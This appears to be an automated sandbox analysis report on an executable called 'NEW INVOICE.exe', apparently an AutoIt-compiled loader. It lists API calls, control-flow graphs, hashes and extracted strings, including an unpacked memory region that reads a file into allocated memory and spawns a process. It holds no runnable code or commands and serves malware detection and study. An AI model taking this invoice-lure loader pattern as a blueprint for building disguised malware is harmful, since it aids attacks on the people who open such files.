                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                    • String ID: #$0$PGH
                                                                                    • API String ID: 423443420-3673556320
                                                                                    • Opcode ID: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                                    • Instruction ID: 6be78a7d21e01e6533eb66d2751721d4fd39e3055bf34e10baa21603515e7cea
                                                                                    • Opcode Fuzzy Hash: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                                    • Instruction Fuzzy Hash: 60216DB5A18300AFD310CF59EC84A4A7FE4FB99710F00497FF648972A0D7B599408B99

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _fseek.LIBCMT ref: 004525DA
                                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                      • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                      • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                                    • __fread_nolock.LIBCMT ref: 00452618
                                                                                    • __fread_nolock.LIBCMT ref: 00452629
                                                                                    • __fread_nolock.LIBCMT ref: 00452644
                                                                                    • __fread_nolock.LIBCMT ref: 00452661
                                                                                    • _fseek.LIBCMT ref: 0045267D
                                                                                    • _malloc.LIBCMT ref: 00452689
                                                                                    • _malloc.LIBCMT ref: 00452696
                                                                                    • __fread_nolock.LIBCMT ref: 004526A7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: __fread_nolock$_fseek_malloc_wcscpy
                                                                                    • String ID:
                                                                                    • API String ID: 1911931848-0
                                                                                    • Opcode ID: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                                    • Instruction ID: daf5751c9f96f1f9c2235ce4d63c31b1673d17b5fb5ed0b9a51dc370059b243a
                                                                                    • Opcode Fuzzy Hash: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                                    • Instruction Fuzzy Hash: 47514CB1A08340AFD310DF5AD881A9BF7E9FFC8704F40492EF68887241D77AE5448B5A

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1294 40f450-40f45c call 425210 1297 40f460-40f478 1294->1297 1297->1297 1298 40f47a-40f4a8 call 413990 call 410f70 1297->1298 1303 40f4b0-40f4d1 call 4151b0 1298->1303 1306 40f531 1303->1306 1307 40f4d3-40f4da 1303->1307 1310 40f536-40f540 1306->1310 1308 40f4dc-40f4de 1307->1308 1309 40f4fd-40f517 call 41557c 1307->1309 1311 40f4e0-40f4e2 1308->1311 1314 40f51c-40f51f 1309->1314 1313 40f4e6-40f4ed 1311->1313 1315 40f521-40f52c 1313->1315 1316 40f4ef-40f4f2 1313->1316 1314->1303 1319 40f543-40f54e 1315->1319 1320 40f52e-40f52f 1315->1320 1317 42937a-4293a0 call 41557c call 4151b0 1316->1317 1318 40f4f8-40f4fb 1316->1318 1331 4293a5-4293c3 call 4151d0 1317->1331 1318->1309 1318->1311 1322 40f550-40f553 1319->1322 1323 40f555-40f560 1319->1323 1320->1316 1322->1316 1324 429372 1323->1324 1325 40f566-40f571 1323->1325 1324->1317 1327 429361-429367 1325->1327 1328 40f577-40f57a 1325->1328 1327->1313 1330 42936d 1327->1330 1328->1316 1330->1324 1331->1310
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: __fread_nolock_fseek_strcat
                                                                                    • String ID: AU3!$EA06
                                                                                    • API String ID: 3818483258-2658333250
                                                                                    • Opcode ID: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                                                    • Instruction ID: a326fe91d6bb541f17a8cee8b09d92be642ba4032c5aa5fe266a96c6f27d1a6c
                                                                                    • Opcode Fuzzy Hash: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                                                    • Instruction Fuzzy Hash: 2B416C7160C340ABC331DA24C841AEB77A59B95308F68087EF5C597683E578E44A876B

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1334 410130-410142 SHGetMalloc 1335 410148-410158 SHGetDesktopFolder 1334->1335 1336 42944f-429459 call 411691 1334->1336 1337 4101d1-4101e0 1335->1337 1338 41015a-410188 call 411691 1335->1338 1337->1336 1344 4101e6-4101ee 1337->1344 1346 4101c5-4101ce 1338->1346 1347 41018a-4101a1 SHGetPathFromIDListW 1338->1347 1346->1337 1348 4101a3-4101b1 call 411691 1347->1348 1349 4101b4-4101c0 1347->1349 1348->1349 1349->1346
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscpy$DesktopFolderFromListMallocPath
                                                                                    • String ID: C:\Users\user\Desktop\NEW INVOICE.exe
                                                                                    • API String ID: 192938534-308002810
                                                                                    • Opcode ID: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                                    • Instruction ID: 2fe23ff91bf644c1e681f842d3c1e96d6f0f177144f23c1ad52f1bdc7517ad48
                                                                                    • Opcode Fuzzy Hash: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                                    • Instruction Fuzzy Hash: 822179B5604211AFC210EB64DC84DABB3ECEFC8704F14891DF94987210E739ED46CBA6

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1352 401230-40123b 1353 401241-401272 call 4131f0 call 401be0 1352->1353 1354 4012c5-4012cd 1352->1354 1359 401274-401292 1353->1359 1360 4012ae-4012bf KillTimer SetTimer 1353->1360 1361 42aa61-42aa67 1359->1361 1362 401298-40129c 1359->1362 1360->1354 1365 42aa8b-42aaa7 Shell_NotifyIconW 1361->1365 1366 42aa69-42aa86 Shell_NotifyIconW 1361->1366 1363 4012a2-4012a8 1362->1363 1364 42aaac-42aab3 1362->1364 1363->1360 1367 42aaf8-42ab15 Shell_NotifyIconW 1363->1367 1368 42aad7-42aaf3 Shell_NotifyIconW 1364->1368 1369 42aab5-42aad2 Shell_NotifyIconW 1364->1369 1365->1360 1366->1360 1367->1360 1368->1360 1369->1360
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00401257
                                                                                      • Part of subcall function 00401BE0: _memset.LIBCMT ref: 00401C62
                                                                                      • Part of subcall function 00401BE0: _wcsncpy.LIBCMT ref: 00401CA1
                                                                                      • Part of subcall function 00401BE0: _wcscpy.LIBCMT ref: 00401CBD
                                                                                      • Part of subcall function 00401BE0: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                                    • KillTimer.USER32(?,?), ref: 004012B0
                                                                                    • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012BF
                                                                                    • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AA80
                                                                                    • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AACC
                                                                                    • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AB0F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
                                                                                    • String ID:
                                                                                    • API String ID: 1792922140-0
                                                                                    • Opcode ID: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                                                                                    • Instruction ID: 78dbdb20408675f5dda5a176dd8a03fc230073daf987e80dd157250a536ae6f7
                                                                                    • Opcode Fuzzy Hash: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                                                                                    • Instruction Fuzzy Hash: 56319670609642BFD319CB24D544B9BFBE8BF85304F04856EF488A3251C7789A19D7AB

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1370 3f73a48-3f73af6 call 3f71478 1373 3f73afd-3f73b23 call 3f74958 CreateFileW 1370->1373 1376 3f73b25 1373->1376 1377 3f73b2a-3f73b3a 1373->1377 1378 3f73c75-3f73c79 1376->1378 1382 3f73b41-3f73b5b VirtualAlloc 1377->1382 1383 3f73b3c 1377->1383 1380 3f73cbb-3f73cbe 1378->1380 1381 3f73c7b-3f73c7f 1378->1381 1384 3f73cc1-3f73cc8 1380->1384 1385 3f73c81-3f73c84 1381->1385 1386 3f73c8b-3f73c8f 1381->1386 1389 3f73b62-3f73b79 ReadFile 1382->1389 1390 3f73b5d 1382->1390 1383->1378 1391 3f73d1d-3f73d32 1384->1391 1392 3f73cca-3f73cd5 1384->1392 1385->1386 1387 3f73c91-3f73c9b 1386->1387 1388 3f73c9f-3f73ca3 1386->1388 1387->1388 1395 3f73ca5-3f73caf 1388->1395 1396 3f73cb3 1388->1396 1397 3f73b80-3f73bc0 VirtualAlloc 1389->1397 1398 3f73b7b 1389->1398 1390->1378 1393 3f73d34-3f73d3f VirtualFree 1391->1393 1394 3f73d42-3f73d4a 1391->1394 1399 3f73cd7 1392->1399 1400 3f73cd9-3f73ce5 1392->1400 1393->1394 1395->1396 1396->1380 1401 3f73bc7-3f73be2 call 3f74ba8 1397->1401 1402 3f73bc2 1397->1402 1398->1378 1399->1391 1403 3f73ce7-3f73cf7 1400->1403 1404 3f73cf9-3f73d05 1400->1404 1410 3f73bed-3f73bf7 1401->1410 1402->1378 1408 3f73d1b 1403->1408 1405 3f73d07-3f73d10 1404->1405 1406 3f73d12-3f73d18 1404->1406 1405->1408 1406->1408 1408->1384 1411 3f73c2a-3f73c3e call 3f749b8 1410->1411 1412 3f73bf9-3f73c28 call 3f74ba8 1410->1412 1418 3f73c42-3f73c46 1411->1418 1419 3f73c40 1411->1419 1412->1410 1420 3f73c52-3f73c56 1418->1420 1421 3f73c48-3f73c4c CloseHandle 1418->1421 1419->1378 1422 3f73c66-3f73c6f 1420->1422 1423 3f73c58-3f73c63 VirtualFree 1420->1423 1421->1420 1422->1373 1422->1378 1423->1422
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03F73B19
                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03F73D3F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062931234.0000000003F71000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F71000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_3f71000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFileFreeVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 204039940-0
                                                                                    • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                                    • Instruction ID: f4c6990e67dea69deb3561a0e30347eddacd936926895f7710d04e97a6df6392
                                                                                    • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                                    • Instruction Fuzzy Hash: 76A11A79E00209EBDB14CFA4C998BEEB7B5FF48304F24819AE511BB280D7759A41DF94

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1424 414f10-414f2c 1425 414f4f 1424->1425 1426 414f2e-414f31 1424->1426 1427 414f51-414f55 1425->1427 1426->1425 1428 414f33-414f35 1426->1428 1429 414f37-414f46 call 417f23 1428->1429 1430 414f56-414f5b 1428->1430 1440 414f47-414f4c call 417ebb 1429->1440 1432 414f6a-414f6d 1430->1432 1433 414f5d-414f68 1430->1433 1436 414f7a-414f7c 1432->1436 1437 414f6f-414f77 call 4131f0 1432->1437 1433->1432 1435 414f8b-414f9e 1433->1435 1438 414fa0-414fa6 1435->1438 1439 414fa8 1435->1439 1436->1429 1442 414f7e-414f89 1436->1442 1437->1436 1443 414faf-414fb1 1438->1443 1439->1443 1440->1425 1442->1429 1442->1435 1446 4150a1-4150a4 1443->1446 1447 414fb7-414fbe 1443->1447 1446->1427 1449 414fc0-414fc5 1447->1449 1450 415004-415007 1447->1450 1449->1450 1451 414fc7 1449->1451 1452 415071-415072 call 41e6b1 1450->1452 1453 415009-41500d 1450->1453 1454 415102 1451->1454 1455 414fcd-414fd1 1451->1455 1466 415077-41507b 1452->1466 1457 41500f-415018 1453->1457 1458 41502e-415035 1453->1458 1461 415106-41510f 1454->1461 1464 414fd3 1455->1464 1465 414fd5-414fd8 1455->1465 1459 415023-415028 1457->1459 1460 41501a-415021 1457->1460 1462 415037 1458->1462 1463 415039-41503c 1458->1463 1468 41502a-41502c 1459->1468 1460->1468 1461->1427 1462->1463 1469 415042-41504e call 41453a call 41ed9e 1463->1469 1470 4150d5-4150d9 1463->1470 1464->1465 1471 4150a9-4150af 1465->1471 1472 414fde-414fff call 41ee9b 1465->1472 1466->1461 1467 415081-415085 1466->1467 1467->1470 1473 415087-415096 1467->1473 1468->1463 1492 415053-415058 1469->1492 1478 4150eb-4150fd call 417f23 1470->1478 1479 4150db-4150e8 call 4131f0 1470->1479 1474 4150b1-4150bd call 4131f0 1471->1474 1475 4150c0-4150d0 call 417f23 1471->1475 1481 415099-41509b 1472->1481 1473->1481 1474->1475 1475->1440 1478->1440 1479->1478 1481->1446 1481->1447 1493 415114-415118 1492->1493 1494 41505e-415061 1492->1494 1493->1461 1494->1454 1495 415067-41506f 1494->1495 1495->1481
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                    • String ID:
                                                                                    • API String ID: 3886058894-0
                                                                                    • Opcode ID: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                                    • Instruction ID: 085ef53bf2cba992f8731f00f2d52beda6aca72a1b803249d76dffc069a60243
                                                                                    • Opcode Fuzzy Hash: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                                    • Instruction Fuzzy Hash: CA510830900604EFCB208FA9C8445DFBBB5EFC5324F24825BF82596290D7799ED2CB99

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1496 4103e0-410461 CreateWindowExW * 2 ShowWindow * 2
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                    • ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                    • ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CreateShow
                                                                                    • String ID: AutoIt v3$edit
                                                                                    • API String ID: 1584632944-3779509399
                                                                                    • Opcode ID: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                                    • Instruction ID: daa3d4afae2654ee996124117597f48fa5c574a0ac4b96d00400a8ba476d7f73
                                                                                    • Opcode Fuzzy Hash: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                                    • Instruction Fuzzy Hash: F3F0A975BE4310BAF6609754AC43F592B59A765F00F3445ABB700BF1D0D6E478408B9C

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1497 3f73828-3f7394b call 3f71478 call 3f73718 CreateFileW 1504 3f73952-3f73962 1497->1504 1505 3f7394d 1497->1505 1508 3f73964 1504->1508 1509 3f73969-3f73983 VirtualAlloc 1504->1509 1506 3f73a02-3f73a07 1505->1506 1508->1506 1510 3f73987-3f7399e ReadFile 1509->1510 1511 3f73985 1509->1511 1512 3f739a2-3f739dc call 3f73758 call 3f72718 1510->1512 1513 3f739a0 1510->1513 1511->1506 1518 3f739de-3f739f3 call 3f737a8 1512->1518 1519 3f739f8-3f73a00 ExitProcess 1512->1519 1513->1506 1518->1519 1519->1506
                                                                                    APIs
                                                                                      • Part of subcall function 03F73718: Sleep.KERNELBASE(000001F4), ref: 03F73729
                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03F73941
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062931234.0000000003F71000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F71000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_3f71000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFileSleep
                                                                                    • String ID: 298IUTD5F40C2K96RBZVRWS
                                                                                    • API String ID: 2694422964-2992489643
                                                                                    • Opcode ID: 19ccbe53dd8012831499af549771ac2f2a3ab6f3bba7c74cc30e6692bd64ce42
                                                                                    • Instruction ID: e0440711964078e492125beb6b8c0d69102180d7dc6250eca34ce8a84b51933f
                                                                                    • Opcode Fuzzy Hash: 19ccbe53dd8012831499af549771ac2f2a3ab6f3bba7c74cc30e6692bd64ce42
                                                                                    • Instruction Fuzzy Hash: 76519435D04389EAEF11DBA4C855BEEBBB9AF05304F04419AE2487B2C0D7B51B49CBA5

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1521 413a88-413a99 call 41718c 1524 413b10-413b15 call 4171d1 1521->1524 1525 413a9b-413aa2 1521->1525 1527 413aa4-413abc call 418407 call 419f6d 1525->1527 1528 413ae7 1525->1528 1538 413ac7-413ad7 call 413ade 1527->1538 1539 413abe-413ac6 call 419f9d 1527->1539 1530 413ae8-413af8 RtlFreeHeap 1528->1530 1530->1524 1533 413afa-413b0f call 417f23 GetLastError call 417ee1 1530->1533 1533->1524 1538->1524 1546 413ad9-413adc 1538->1546 1539->1538 1546->1530
                                                                                    APIs
                                                                                    • __lock.LIBCMT ref: 00413AA6
                                                                                      • Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
                                                                                      • Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
                                                                                      • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
                                                                                    • ___sbh_find_block.LIBCMT ref: 00413AB1
                                                                                    • ___sbh_free_block.LIBCMT ref: 00413AC0
                                                                                    • RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                                                                                    • GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                    • String ID:
                                                                                    • API String ID: 2714421763-0
                                                                                    • Opcode ID: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                                    • Instruction ID: 54fb22c17cbd059cfb8714ef359fce415cc636064f476ff80f42ef981757bf49
                                                                                    • Opcode Fuzzy Hash: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                                    • Instruction Fuzzy Hash: 7401A731A08301BADF206F71AC09BDF3B64AF00759F10052FF544A6182DB7D9AC19B9C

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1547 40f5e0-40f62f call 40f580 call 413990 call 4112ef call 40f6a0 call 40f6d0 1558 40f631-40f653 1547->1558 1558->1558 1559 40f655-40f66d call 414e06 1558->1559 1562 40f673-40f67b call 40f450 1559->1562 1563 42b2ee 1559->1563 1566 42b2f8-42b322 call 4151b0 call 44afdc 1562->1566 1567 40f681-40f695 call 414e94 1562->1567 1563->1566 1574 42b324-42b330 1566->1574 1574->1574 1575 42b332-42b338 call 415484 1574->1575 1577 42b33d-42b343 1575->1577
                                                                                    APIs
                                                                                      • Part of subcall function 0040F580: _wcslen.LIBCMT ref: 0040F58A
                                                                                      • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0040F5A3
                                                                                      • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,-00000010,00000001,?,?,?,?), ref: 0040F5CC
                                                                                    • _strcat.LIBCMT ref: 0040F603
                                                                                      • Part of subcall function 0040F6A0: _memset.LIBCMT ref: 0040F6A8
                                                                                      • Part of subcall function 0040F6D0: _strlen.LIBCMT ref: 0040F6D8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$_memset_strcat_strlen_wcslen
                                                                                    • String ID: HH
                                                                                    • API String ID: 1194219731-2761332787
                                                                                    • Opcode ID: 6830d432ce0edc537904fcc81a92ccb4243d6e1eaca554fb6fd30da9042373f9
                                                                                    • Instruction ID: 1fd31f67f6889806bd2ce24d6488871f5ee50ddf162d20410a363c4a19aba518
                                                                                    • Opcode Fuzzy Hash: 6830d432ce0edc537904fcc81a92ccb4243d6e1eaca554fb6fd30da9042373f9
                                                                                    • Instruction Fuzzy Hash: 022158B260825067C724EF7A9C8266EF7D8AF85308F148C3FF554D2282F638D555879A
                                                                                    APIs
                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 03F72ED3
